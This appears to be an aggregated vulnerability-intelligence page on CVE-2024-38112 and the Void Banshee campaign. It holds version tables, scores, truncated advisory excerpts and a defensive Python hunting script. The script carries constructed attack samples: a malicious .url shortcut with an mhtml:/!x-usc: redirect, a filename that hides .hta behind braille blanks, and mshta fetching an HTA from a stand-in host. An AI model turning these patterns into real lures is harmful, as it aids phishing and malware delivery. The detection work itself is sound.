CVE-2024-38112
Published 2024-07-09
Windows MSHTML Platform Spoofing Vulnerability
Severity: High, CVSS 3.1 base score 7.5 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
Tags: KEV, ITW
CISA Known Exploited Vulnerability, remediation due 2024-07-30
Exploited in the wild
EPSS: 84.34% (99.7th percentile)
Affected (31 ranges, showing 25)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_10_version_1507 | >= 10.0.10240.0 < 10.0.10240.20710 | 10.0.10240.20710 |
| microsoft | windows_10_version_1607 | >= 10.0.14393.0 < 10.0.14393.7159 | 10.0.14393.7159 |
| microsoft | windows_10_version_1809 | >= 10.0.17763.0 < 10.0.17763.6054 | 10.0.17763.6054 |
| microsoft | windows_10_version_21h2 | >= 10.0.19043.0 < 10.0.19044.4651 | 10.0.19044.4651 |
| microsoft | windows_10_version_22h2 | >= 10.0.19045.0 < 10.0.19045.4651 | 10.0.19045.4651 |
| microsoft | windows_11_version_21h2 | >= 10.0.0 < 10.0.22000.3079 | 10.0.22000.3079 |
| microsoft | windows_11_version_22h2 | >= 10.0.22621.0 < 10.0.22621.3880 | 10.0.22621.3880 |
| microsoft | windows_11_version_22h3 | >= 10.0.22631.0 < 10.0.22631.3880 | 10.0.22631.3880 |
| microsoft | windows_11_version_23h2 | >= 10.0.22631.0 < 10.0.22631.3880 | 10.0.22631.3880 |
| microsoft | windows_server_2008_service_pack_2 | >= 6.0.6003.0 < 6.0.6003.22769 | 6.0.6003.22769 |
| microsoft | windows_server_2012_r2 | >= 6.3.9600.0 < 6.3.9600.22074 | 6.3.9600.22074 |
| microsoft | windows_server_2016 | >= 10.0.14393.0 < 10.0.14393.7159 | 10.0.14393.7159 |
| microsoft | windows_server_2019 | >= 10.0.17763.0 < 10.0.17763.6054 | 10.0.17763.6054 |
| microsoft | windows_server_2022 | >= 10.0.20348.0 < 10.0.20348.2582 | 10.0.20348.2582 |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_21h2 | — | — |
| msrc | windows_10_version_22h2 | — | — |
| msrc | windows_11_version_21h2 | — | — |
| msrc | windows_11_version_22h2 | — | — |
| msrc | windows_11_version_23h2 | — | — |
| msrc | windows_11_version_24h2 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
Detection & IOCs (extracted from sources)
- filename: Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
- bytes: %E2%A0%80 (URL-encoded UTF-8 of U+2800 BRAILLE PATTERN BLANK, repeated 26 times in the filename above)
Detection guidance:
- Detect .URL shortcut files whose URL parameter combines the MHTML protocol handler with the x-usc! directive; this is the core exploit mechanism for CVE-2024-38112.
- Alert on iexplore.exe spawning child processes or making outbound network connections, especially to download HTA files. Internet Explorer is disabled and should not be initiating such activity.
- Hunt for HTA filenames containing 26 repeated URL-encoded braille blank characters (%E2%A0%80), used to push the .hta extension out of view and masquerade as PDF files.
- Detect VBScript within HTA files performing XOR decryption (key 4) followed by PowerShell execution, characteristic of Stage 3 of the Void Banshee chain.
- Monitor for use of the Win32_Process WMI class from PowerShell scripts fetched via irm/iex, used in Stage 3 to launch the next-stage payload.
- Look for internet shortcut (.url) files carrying a PDF icon and distributed inside zip archives; Void Banshee changed the default icon of the internet shortcut file to that of a PDF file.
- Detect Windows Internet Shortcut (.url) files that, when clicked, invoke Internet Explorer (iexplore.exe) to visit attacker-controlled URLs rather than opening in Edge.

Caveats:
- The MHTML handler was unregistered from Internet Explorer as part of the July 2024 Patch Tuesday fix, so MHTML is no longer usable inside internet shortcut files on patched systems; detections targeting this vector matter most for unpatched hosts.
- The CVE-2024-43461 fix for the braille whitespace extension-hiding technique is incomplete: the whitespace is not stripped, only the real .hta extension is now shown, which may still confuse users.
- The original discoverers (ZDI/Trend Micro) and Microsoft disagree on severity: ZDI classifies CVE-2024-38112 as a remote code execution vulnerability warranting a Critical rating, while Microsoft disclosed it as a spoofing vulnerability with a lower CVSS score.
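As an added example (not code from any of the reports cited on this page), the following Python script implements three of the hunts listed above: parsing an Internet Shortcut for the mhtml: handler and the !x-usc: directive, counting braille blanks that hide a .hta extension behind a fake .pdf, and flagging iexplore.exe process-creation or outbound-connection events in Sysmon-style telemetry. Every sample input (the .url text, the file names, the event records with example.invalid and 203.0.113.7) is constructed for the demo, and the PDF-icon heuristic on IconFile is an assumption rather than a documented indicator.

```python
"""Hunting helpers for the CVE-2024-38112 / CVE-2024-43461 (Void Banshee) chain.

Added example for this page, not code from any of the cited reports.
Checks implemented:
  1. .url content: mhtml: handler plus the !x-usc: redirect directive
     (and, as a heuristic assumption, a PDF-looking IconFile).
  2. File names padding a fake extension with U+2800 braille blanks
     in front of the real ".hta".
  3. Sysmon-style events where iexplore.exe spawns a child or connects out.
All sample inputs below are constructed for the demo.
"""
import re
from urllib.parse import unquote

BRAILLE_BLANK = "\u2800"   # appears URL-encoded as %E2%A0%80 in the lure file names


def parse_internet_shortcut(text: str) -> dict:
    """Parse the INI-style [InternetShortcut] section into a dict of lower-cased keys."""
    keys, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            keys[key.strip().lower()] = value.strip()
    return keys


def url_shortcut_findings(text: str) -> list:
    """Reasons a .url file looks like the CVE-2024-38112 lure (empty list = nothing found)."""
    keys = parse_internet_shortcut(text)
    url = keys.get("url", "")
    findings = []
    if re.match(r"mhtml:", url, re.IGNORECASE):
        findings.append("mhtml: handler forces the link to open in MSHTML / Internet Explorer")
    if re.search(r"!x-usc:", url, re.IGNORECASE):
        findings.append("!x-usc: directive sends IE on to a second, attacker-chosen URL")
    icon = keys.get("iconfile", "").lower()
    if "pdf" in icon or "acro" in icon:   # assumption: icon borrowed from a PDF reader
        findings.append("IconFile gives a .url shortcut a PDF icon")
    return findings


def hidden_hta_name(name: str) -> int:
    """Count braille blanks padding a fake extension before a real .hta (0 = clean)."""
    decoded = unquote(name)
    pattern = rf"\.[A-Za-z0-9]{{1,5}}({BRAILLE_BLANK}+)\.hta$"
    match = re.search(pattern, decoded, re.IGNORECASE)
    return len(match.group(1)) if match else 0


def suspicious_ie_events(events: list) -> list:
    """Flag iexplore.exe creating children (Sysmon EventID 1) or connecting out (EventID 3)."""
    hits = []
    for event in events:
        parent = event.get("ParentImage", "").lower()
        image = event.get("Image", "").lower()
        if event.get("EventID") == 1 and parent.endswith("\\iexplore.exe"):
            child = image.rsplit("\\", 1)[-1]
            hits.append(f"iexplore.exe spawned {child}: {event.get('CommandLine', '')}")
        elif event.get("EventID") == 3 and image.endswith("\\iexplore.exe"):
            hits.append(f"iexplore.exe connected to "
                        f"{event.get('DestinationIp')}:{event.get('DestinationPort')}")
    return hits


# ---- constructed samples (not real indicators) ----
SAMPLE_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=mhtml:http://example.invalid/share/lure.html!x-usc:http://example.invalid/stage2\n"
    "IconFile=C:\\Program Files\\Adobe\\Acrobat Reader\\AcroRd32.exe\n"
    "IconIndex=1\n"
)
SAMPLE_NAMES = [
    "Books_A0UJKO.pdf" + "%E2%A0%80" * 26 + ".hta",   # lure: 26 braille blanks hide .hta
    "quarterly_report.pdf",                           # benign
    "installer.hta",                                  # HTA, but nothing hidden
]
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/Books_A0UJKO.pdf.hta"},
    {"EventID": 3, "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
     "CommandLine": "msedge.exe https://example.invalid/"},
]

if __name__ == "__main__":
    for finding in url_shortcut_findings(SAMPLE_URL_FILE):
        print("[.url]", finding)
    for name in SAMPLE_NAMES:
        print(f"[name] {hidden_hta_name(name):2d} braille blanks in {unquote(name)!r}")
    for hit in suspicious_ie_events(SAMPLE_EVENTS):
        print("[proc]", hit)
```

`hidden_hta_name` returns the count rather than a boolean so a rule can alert on any nonzero padding instead of hard-coding the 26 blanks seen in the sampled lure; the process rule deliberately has no allowlist, because a retired Internet Explorer should have no legitimate children or outbound connections to exclude.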
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H |
| cvelistv5 | — | 7.5 | HIGH | — |
| vulncheck | — | 8.8 | HIGH | — |
| cisa | — | 7.5 | HIGH | — |
| vendor_msrc | — | 8.8 | HIGH | — |
CVEList
Windows MSHTML Platform Spoofing Vulnerability
cvelistv5 · 2024-07-09 · CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Windows MSHTML Platform Spoofing Vulnerability
VulnCheck
Microsoft Windows MSHTML Platform Spoofing Vulnerability
vulncheck·2024·CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Microsoft Windows MSHTML Platform contains a spoofing vulnerability that has a high impact on confidentiality, integrity, and availability.
Affected: Microsoft Windows
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2024-Jul; https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112; https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trendmicro.com/en_us/research/24/g/
VulnCheck
Microsoft Windows MSHTML Platform Spoofing Vulnerability
vulncheck·2024·CVSS 7.5
CVE-2024-43461 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Microsoft Windows MSHTML Platform contains a user interface (UI) misrepresentation of critical information vulnerability that allows an attacker to spoof a web page. This vulnerability was exploited in conjunction with CVE-2024-38112.
Affected: Microsoft Windows
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2024-Sep; https://www.zerodayinitiative.com/blog/2024/9/10/the-september-2024-security-update-review; https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43461; https://www.bleepingcomputer.com/news/security/windows-vulnerability-abused-braille-spaces-in-zero-day-atta
VulnCheck
Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
vulncheck·2023·CVSS 8.8
CVE-2023-36025 [HIGH] Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
Microsoft Windows SmartScreen contains a security feature bypass vulnerability that could allow an attacker to bypass Windows Defender SmartScreen checks and their associated prompts.
Affected: Microsoft Windows
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2023-Nov; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://twitter.com/ffforward/status/1726540034462159165; https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html; https://uni
VulnCheck
Microsoft MSHTML Remote Code Execution Vulnerability
vulncheck·2021·CVSS 8.8
CVE-2021-40444 [HIGH] CWE-22 Microsoft MSHTML Remote Code Execution Vulnerability
Microsoft MSHTML contains an unspecified vulnerability that allows for remote code execution.
Affected: Microsoft MSHTML
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2021-Sep; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.microsoft.com/en-us/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/; https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/; https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/; https://www.
CISA
Microsoft Windows MSHTML Platform Spoofing Vulnerability
cisa·2024-09-16·CVSS 7.5
CVE-2024-43461 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Vulnerability: Microsoft Windows MSHTML Platform Spoofing Vulnerability
Affected: Microsoft Windows
Microsoft Windows MSHTML Platform contains a user interface (UI) misrepresentation of critical information vulnerability that allows an attacker to spoof a web page. This vulnerability was exploited in conjunction with CVE-2024-38112.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43461 ; https://nvd.nist.gov/vuln/detail/CVE-2024-43461
Remediation Due Date: 2024-10-07
Microsoft
Windows MSHTML Platform Spoofing Vulnerability
vendor_msrc·2024-09-10·CVSS 8.8
CVE-2024-43461 [HIGH] CWE-451 Windows MSHTML Platform Spoofing Vulnerability
FAQ: The Security Updates table indicates that this vulnerability affects all supported versions of Microsoft Windows. Why are IE Cumulative updates listed for Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2?
While Microsoft has announced retirement of the Internet Explorer 11 application on certain platforms and the Microsoft Edge Legacy application is deprecated, the underlying MSHTML, EdgeHTML, and scripting platforms are still supported. The MSHTML platform is used by Internet Explorer mode in Microsoft Edge as well as other applications through WebBrowser control. The EdgeHTML platform is used by WebView and some UWP applications. The scripting platforms are used by MSHTML and EdgeHTML but can
CISA
Microsoft Windows MSHTML Platform Spoofing Vulnerability
cisa·2024-07-09·CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Vulnerability: Microsoft Windows MSHTML Platform Spoofing Vulnerability
Affected: Microsoft Windows
Microsoft Windows MSHTML Platform contains a spoofing vulnerability that has a high impact on confidentiality, integrity, and availability.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112; https://nvd.nist.gov/vuln/detail/CVE-2024-38112
Remediation Due Date: 2024-07-30
Microsoft
Windows MSHTML Platform Spoofing Vulnerability
vendor_msrc·2024-07-09·CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Windows MSHTML Platform Spoofing Vulnerability
FAQ: According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?
Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.
FAQ: According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?
An attacker would have to send the victim a malicious file that the victim would have to execute.
Product: Windows MSHTML Platform
Vendor: Microsoft
Customer Action Required: Yes
Impact: Spoofing
Exploit Status: Publicly Disclosed: No; Exploited: Yes; Latest Software Release: Exploitation Detected
Reference: https://catalog.update.microsoft.com/
No detection rules found.
No public exploits indexed.
Tenable
Microsoft Patch Tuesday 2024 Year in Review
blogs_tenable · 2024-12-10
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Tenable
Microsoft’s October 2024 Patch Tuesday Addresses 117 CVEs (CVE-2024-43572, CVE-2024-43573)
blogs_tenable·2024-10-08·CVSS 7.8
[HIGH] Microsoft’s October 2024 Patch Tuesday Addresses 117 CVEs (CVE-2024-43572, CVE-2024-43573)
Bleepingcomputer
CISA warns of Windows flaw used in infostealer malware attacks
blogs_bleepingcomputer·2024-09-16·CVSS 7.5
CVE-2024-38112 [HIGH] CISA warns of Windows flaw used in infostealer malware attacks
## CISA warns of Windows flaw used in infostealer malware attacks
## Sergiu Gatlan
"We released a fix for CVE-2024-38112 in our July 2024 security updates which broke this attack chain," it said. "Customers should install both the July 2024 and September 2024 security updates to fully protect themselves."
Peter Girnus, the Trend Micro Zero Day Initiative (ZDI) threat researcher who reported the security flaw, told BleepingComputer that Void Banshee hackers exploited it in zero-day attacks to install information-stealing malware.
The vulnerability enables remote attackers to execute arbitrary code on unpatched Windows systems by tricking the targets into visiting a maliciously crafted webpage or opening a malicious file.
"The specific flaw exists within the way Internet Explorer prompts the use
Bleepingcomputer
Windows vulnerability abused braille “spaces” in zero-day attacks
blogs_bleepingcomputer·2024-09-15·CVSS 7.5
CVE-2024-43461 [HIGH] Windows vulnerability abused braille “spaces” in zero-day attacks
## Windows vulnerability abused braille “spaces” in zero-day attacks
## Lawrence Abrams
Void Banshee is an APT hacking group first tracked by Trend Micro that targets organizations in North America, Europe, and Southeast Asia to steal data and for financial gain.
## The CVE-2024-43461 zero-day
In July, Check Point Research and Trend Micro both reported on the same attacks that exploited Windows zero-days to infect devices with the Atlantida info-stealer, used to steal passwords, authentication cookies, and cryptocurrency wallets from infected devices.
The attacks utilized zero-days tracked as CVE-2024-38112 (fixed in July) and CVE-2024-43461 (fixed this month) as part of the attack chain.
The discovery of the CVE-2024-38112 zero-day was attributed to Check Point researcher Haifei Li
Qualys
Cybersecurity Threat Landscape 2024 Midyear Review
blogs_qualys·2024-08-06
Cybersecurity Threat Landscape 2024 Midyear Review
## Table of Contents
Key Takeaways from the Threat Landscape Report 2024
Vulnerability and Threat Analysis in the Cybersecurity Landscape 2024
Cyber Threat Landscape 2024 A Detailed Review
Key Statistics and Their Impact on the 2024 Cybersecurity Landscape
Mid-2024s Most Exploited Vulnerabilities in the Cybersecurity Landscape
Conclusion
As we navigate the complexities of 2024, it’s crucial to pause and reflect on the evolving threat landscape that surrounds us. This moment offers a unique opportunity to scrutinize our triumphs and missteps, understand the events that have decisively shaped our environment, and consider those that have subtly influenced it. By extracting key lessons from our recent experiences, we can fortify our strategies and prepare more effectively for the emerg
Talos
It's best to just assume you’ve been involved in a data breach somehow
blogs_talos·2024-07-18
It's best to just assume you’ve been involved in a data breach somehow
Between AT&T, all the follow-on activity from Snowflake, Microsoft Outlook, and more, it’s best to probably just assume at this point that your personal information has somehow been involved in a data breach.
We’re only halfway through 2024, and we’ve already seen some of the largest data breaches and leaks in history. Telecommunications provider AT&T disclosed earlier this month that adversaries stole a cache of data that contained the phone numbers and call records of “nearly all” of its customers, which equates to about 110 million people.
Even if you’ve yet to receive the dreaded boilerplate notification email from any company, it’s probably just best for all of us to assume that some of our personal information has been accessed, leaked or stolen over the past few years, or it’s goi
Trendmicro
CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Exploits & Vulnerabilities
## CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi, 2024/07/15
Report Highlights:
In May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported this as a zero-day vulnerability to Microsoft.
The
Trendmicro
Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
# Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
Learn about uncoordinated vulnerability disclosure and the continuing issues with CVD.
By: Dustin Childs, 2024/07/15
On patch Tuesday last week, Microsoft released an update for CVE-2024-38112, which they said was being exploited in the wild. We at the Trend Micro Zero Day Initiative (ZDI) agree with them because that’s what we told them back in May when we detected this exploit in the wild and reported it to Microsoft. However, you may notice that no one from Trend or ZDI was acknowledged by Microsoft. This case has become a microcosm of the problems with coordinated vulnerability disclosure (CVD) as vendors push for coordinated disclosure from researchers but rarely practice
Checkpoint
15th July – Threat Intelligence Report
blogs_checkpoint·2024-07-15
CVE-2024-38112 15th July – Threat Intelligence Report
## 15th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 15th July, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
American telecom giant AT&T has disclosed a massive data breach that exposed personal information of 110M of its customers. The data was stolen from the company’s workspace on a third-party cloud platform, referring to Snowflake. The leaked data allegedly includes the full metadata of all of AT&T mobile customers, which can be
Trendmicro
The July 2024 Security Update Review
blogs_trendmicro·2024-07-09
The July 2024 Security Update Review
## The July 2024 Security Update Review
A review of the July 2024 security updates from Microsoft and Adobe.
By: Dustin Childs, 2024/07/09
We’re just past the halfway point of 2024, and as expected, Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:
Adobe Patches for July 2024
For July, Adobe released three patches addressing seven CVEs in Adobe Premiere Pro, InDesign, and Adobe Bridge. The patch for InDesign is the largest, fixing four Critical-rated CVEs. All four could lead to arbitrary code execution. The fix for Premiere Pro fixes a single CVE
Krebs
Microsoft Patch Tuesday, July 2024 Edition
blogs_krebs·2024-07-09·CVSS 9.8
CVE-2024-38080 [CRITICAL] Microsoft Patch Tuesday, July 2024 Edition
Microsoft Corp. today issued software updates to plug at least 139 security holes in various flavors of Windows and other Microsoft products. Redmond says attackers are already exploiting at least two of the vulnerabilities in active attacks against Windows users.
The first Microsoft zero-day this month is CVE-2024-38080 , a bug in the Windows Hyper-V component that affects Windows 11 and Windows Server 2022 systems. CVE-2024-38080 allows an attacker to increase their account privileges on a Windows machine. Although Microsoft says this flaw is being exploited, it has offered scant details about its exploitation.
The other zero-day is CVE-2024-38112 , which is a weakness in MSHTML , the proprietary engine of Microsoft’s Internet Explorer web browser. Kevin Breen , senior director of thre
Tenable
Microsoft’s July 2024 Patch Tuesday Addresses 138 CVEs (CVE-2024-38080, CVE-2024-38112)
blogs_tenable·2024-07-09·CVSS 7.8
[HIGH] Microsoft’s July 2024 Patch Tuesday Addresses 138 CVEs (CVE-2024-38080, CVE-2024-38112)
Qualys
Microsoft and Adobe Patch Tuesday, July 2024 Security Update Review
blogs_qualys·2024-07-09
Microsoft and Adobe Patch Tuesday, July 2024 Security Update Review
## Table of Contents
Microsoft Patch Tuesday for July 2024
Adobe Patches for July 2024
Zero-day Vulnerabilities Patched in July Patch Tuesday Edition
Critical Severity Vulnerabilities Patched in July Patch Tuesday Edition
Other Microsoft Vulnerability Highlights
Microsoft Release Summary
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Evaluate Vendor-Suggested Mitigation with Policy Compliance (PC)
Qualys Monthly Webinar Series
July’s Patch Tuesday brings a midsummer wave of updates, addressing critical vulnerabilities and enhancing security across the Microsoft ecosystem. Let’s discover the highlights from Microsoft’s Patch Tuesday updates for July 2024.
## Microsoft Patch Tuesday for July
Checkpoint
Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
blogs_checkpoint·2024-07-09·CVSS 8.8
CVE-2024-38112 [HIGH] Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
## Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
by Haifei Li
## Introduction and Background
Check Point R
Trendmicro
The July 2024 Security Update Review
blogs_trendmicro·2024-07-09
The July 2024 Security Update Review
# The July 2024 Security Update Review
Get the July 2024 security update and review.
By: Dustin Childs
2024/07/09
Qualys
Microsoft and Adobe July 2024 Security Patches Explained | Qualys
blogs_qualys·2024-07-09
Microsoft and Adobe July 2024 Security Patches Explained | Qualys
#### Table of Contents
- Microsoft Patch Tuesday for July 2024
- Adobe Patches for July 2024
- Zero-day Vulnerabilities Patched in July Patch Tuesday Edition
- Critical Severity Vulnerabilities Patched in July Patch Tuesday Edition
- Other Microsoft Vulnerability Highlights
- Microsoft Release Summary
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
- Evaluate Vendor-Suggested Mitigation with Policy Compliance (PC)
- Qualys Monthly Webinar Series
July’s Patch Tuesday brings a midsummer wave of updates, addressing critical vulnerabilities and enhancing security across the Microsoft ecosystem. Let’s discover the highlights from Microsoft’s Patch Tuesday updates for July 2024.
## Microsoft Patch Tue
Threat Intel
Void Banshee
threat_intel·CVSS 7.5
CVE-2024-38112 [HIGH] Void Banshee
# Threat Actor: Void Banshee
## Description
Void Banshee is an APT group targeting North America, Europe, and Southeast Asia for information theft and financial gain. They exploit vulnerabilities like CVE-2024-38112 to deliver the Atlantida info-stealer through malicious PDFs disguised as book files. The group uses internet shortcuts with MHTML protocol handlers to access and execute files through disabled Internet Explorer, posing a significant threat to organizations. Void Banshee's TTPs include crafting URL strings to control window sizes in IE and using HTML files to hide malicious downloads from victims.
Crowdstrike
July 2024 Patch Tuesday: Updates and Analysis
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] July 2024 Patch Tuesday: Updates and Analysis
arXiv
LLM-Assisted Proactive Threat Intelligence for Automated Reasoning
arxiv_fulltext·2025-04-01
LLM-Assisted Proactive Threat Intelligence for Automated Reasoning
LLM-Assisted Proactive Threat Intelligence for Automated Reasoning
Shuva Paul, Member, IEEE,
Farhad Alemi, Student Member, IEEE,
and Richard Macwan, Member, IEEE
Farhad Alemi is a graduate researcher at Arizona State University.
Shuva Paul and Richard Macwan are researchers at the National Renewable Energy Laboratory, Golden, CO
## Abstract
Successful defense against dynamically evolving cyber threats requires advanced and sophisticated techniques. This research presents a novel approach to enhance real-time cybersecurity threat detection and response by integrating large language models (LLMs) and Retrieval-Augmented Generation (RAG) systems with continuous threat intelligen
Published: 2024-07-09
Added to CISA KEV: 2024-07-09
Exploited in the wild